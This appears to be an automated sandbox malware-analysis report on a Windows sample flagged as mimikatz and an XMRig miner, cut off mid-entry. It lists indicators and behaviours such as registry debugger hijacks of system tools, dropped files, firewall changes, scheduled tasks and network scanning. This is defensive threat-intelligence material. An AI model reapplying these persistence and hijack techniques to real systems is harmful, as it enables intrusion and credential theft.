Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09/03/2024, 10:24
Behavioral task
behavioral1
Sample
2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe
-
Size
9.9MB
-
MD5
74e1e0877fc19c4468e50e36323ce156
-
SHA1
e34082629b6b4cdf5b9c235a7ea06e293145dc3a
-
SHA256
3820e58d6df412fa8455b8f32d25824e9a7598899524a0b534a78a39b1276062
-
SHA512
d5f1995e30219074b998765fcd8286ecf56ad8b38a48a0c67f6ff4fa68aaf071a07838f4eff7ea7f5fc132ac44633b47f81c2e79578f9954ea4cb174b3dd260e
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1764 created 2160 1764 puelpci.exe 39 -
Contacts a large (25449) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/472-136-0x00007FF680120000-0x00007FF68020E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 39 IoCs
resource yara_rule behavioral2/memory/1840-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023203-5.dat UPX behavioral2/memory/1000-7-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023203-8.dat UPX behavioral2/files/0x000700000002327f-126.dat UPX behavioral2/files/0x0007000000023279-133.dat UPX behavioral2/memory/472-134-0x00007FF680120000-0x00007FF68020E000-memory.dmp UPX behavioral2/memory/472-136-0x00007FF680120000-0x00007FF68020E000-memory.dmp UPX behavioral2/files/0x0007000000023284-139.dat UPX behavioral2/memory/1364-140-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/1364-143-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/files/0x0007000000023281-146.dat UPX behavioral2/memory/4616-147-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/888-170-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4592-174-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4616-176-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/3152-179-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/1048-184-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4456-188-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/3868-192-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4616-194-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/4132-197-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/1976-201-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/3304-205-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4616-207-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/2712-210-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4616-216-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/3528-219-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/3232-223-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4616-225-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/1616-228-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/2340-231-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4616-242-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/5968-244-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/5652-246-0x00007FF639120000-0x00007FF63917B000-memory.dmp UPX behavioral2/memory/4616-247-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/4616-248-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/4616-249-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX behavioral2/memory/4616-252-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp UPX -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4616-176-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-194-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-207-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-216-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-225-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-242-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-247-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-248-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-249-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig behavioral2/memory/4616-252-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/1840-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023203-5.dat mimikatz behavioral2/memory/1000-7-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023203-8.dat mimikatz behavioral2/files/0x000700000002327f-126.dat mimikatz behavioral2/memory/472-136-0x00007FF680120000-0x00007FF68020E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts puelpci.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts puelpci.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4392 netsh.exe 1512 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe -
Executes dropped EXE 28 IoCs
pid Process 1000 puelpci.exe 1764 puelpci.exe 2080 wpcap.exe 1756 nfzqetiti.exe 472 vfshost.exe 1364 tvfbneign.exe 4616 dlbkbn.exe 4524 xohudmc.exe 872 varpws.exe 888 tvfbneign.exe 4592 tvfbneign.exe 3152 tvfbneign.exe 1048 tvfbneign.exe 4456 tvfbneign.exe 3868 tvfbneign.exe 4132 tvfbneign.exe 1976 tvfbneign.exe 3304 tvfbneign.exe 2712 tvfbneign.exe 824 puelpci.exe 3528 tvfbneign.exe 3232 tvfbneign.exe 1616 tvfbneign.exe 2340 tvfbneign.exe 3348 blitiliem.exe 5968 tvfbneign.exe 5652 tvfbneign.exe 5320 puelpci.exe -
Loads dropped DLL 12 IoCs
pid Process 2080 wpcap.exe 2080 wpcap.exe 2080 wpcap.exe 2080 wpcap.exe 2080 wpcap.exe 2080 wpcap.exe 2080 wpcap.exe 2080 wpcap.exe 2080 wpcap.exe 1756 nfzqetiti.exe 1756 nfzqetiti.exe 1756 nfzqetiti.exe -
resource yara_rule behavioral2/files/0x0007000000023279-133.dat upx behavioral2/memory/472-134-0x00007FF680120000-0x00007FF68020E000-memory.dmp upx behavioral2/memory/472-136-0x00007FF680120000-0x00007FF68020E000-memory.dmp upx behavioral2/files/0x0007000000023284-139.dat upx behavioral2/memory/1364-140-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/1364-143-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/files/0x0007000000023281-146.dat upx behavioral2/memory/4616-147-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/888-170-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4592-174-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4616-176-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/3152-179-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/1048-184-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4456-188-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/3868-192-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4616-194-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/4132-197-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/1976-201-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/3304-205-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4616-207-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/2712-210-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4616-216-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/3528-219-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/3232-223-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4616-225-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/1616-228-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/2340-231-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4616-242-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/5968-244-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/5652-246-0x00007FF639120000-0x00007FF63917B000-memory.dmp upx behavioral2/memory/4616-247-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/4616-248-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/4616-249-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx behavioral2/memory/4616-252-0x00007FF654AB0000-0x00007FF654BD0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 105 ifconfig.me 106 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\varpws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 puelpci.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\varpws.exe xohudmc.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A puelpci.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE puelpci.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\spoolsrv.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\AppCapture32.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\coli-0.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\libxml2.dll puelpci.exe File opened for modification C:\Windows\ibimzzri\vimpcsvc.xml puelpci.exe File created C:\Windows\btlbpeceu\Corporate\mimidrv.sys puelpci.exe File opened for modification C:\Windows\btlbpeceu\hnkiaiely\Packet.dll puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\wpcap.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\crli-0.dll puelpci.exe File opened for modification C:\Windows\ibimzzri\schoedcl.xml puelpci.exe File created C:\Windows\btlbpeceu\Corporate\vfshost.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\xdvl-0.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\Shellcode.ini puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\trfo-2.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\spoolsrv.exe puelpci.exe File created C:\Windows\ibimzzri\spoolsrv.xml puelpci.exe File created C:\Windows\ibimzzri\schoedcl.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\schoedcl.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\svschost.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\vimpcsvc.xml puelpci.exe File opened for modification C:\Windows\btlbpeceu\hnkiaiely\Result.txt blitiliem.exe File opened for modification C:\Windows\ibimzzri\puelpci.exe 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\trch-1.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\vimpcsvc.xml puelpci.exe File created C:\Windows\ibimzzri\vimpcsvc.xml puelpci.exe File opened for modification C:\Windows\ibimzzri\spoolsrv.xml puelpci.exe File created C:\Windows\ime\puelpci.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\zlib1.dll puelpci.exe File opened for modification C:\Windows\ibimzzri\docmicfg.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\spoolsrv.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\docmicfg.xml puelpci.exe File created C:\Windows\ibimzzri\puelpci.exe 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe File created C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\docmicfg.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\schoedcl.xml puelpci.exe File created C:\Windows\ibimzzri\svschost.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\AppCapture64.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\exma-1.dll puelpci.exe File created C:\Windows\ibimzzri\docmicfg.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\cnli-1.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\svschost.exe puelpci.exe File created C:\Windows\btlbpeceu\Corporate\mimilib.dll puelpci.exe File opened for modification C:\Windows\btlbpeceu\Corporate\log.txt cmd.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\tibe-2.dll puelpci.exe File created C:\Windows\btlbpeceu\upbdrjv\swrpwe.exe puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\Packet.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\posh-0.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\vimpcsvc.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\docmicfg.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\schoedcl.xml puelpci.exe File opened for modification C:\Windows\ibimzzri\svschost.xml puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\ip.txt puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\scan.bat puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\blitiliem.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\libeay32.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\ssleay32.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\tucl-1.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\ucl.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\svschost.xml puelpci.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3808 sc.exe 1304 sc.exe 924 sc.exe 5000 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 5 IoCs
resource yara_rule behavioral2/files/0x0007000000023203-5.dat nsis_installer_2 behavioral2/files/0x0007000000023203-8.dat nsis_installer_2 behavioral2/files/0x001100000002321e-14.dat nsis_installer_1 behavioral2/files/0x001100000002321e-14.dat nsis_installer_2 behavioral2/files/0x000700000002327f-126.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4176 schtasks.exe 1356 schtasks.exe 3384 schtasks.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" puelpci.exe Key created \REGISTRY\USER\.DEFAULT\Software tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" puelpci.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" puelpci.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" puelpci.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing puelpci.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ puelpci.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key 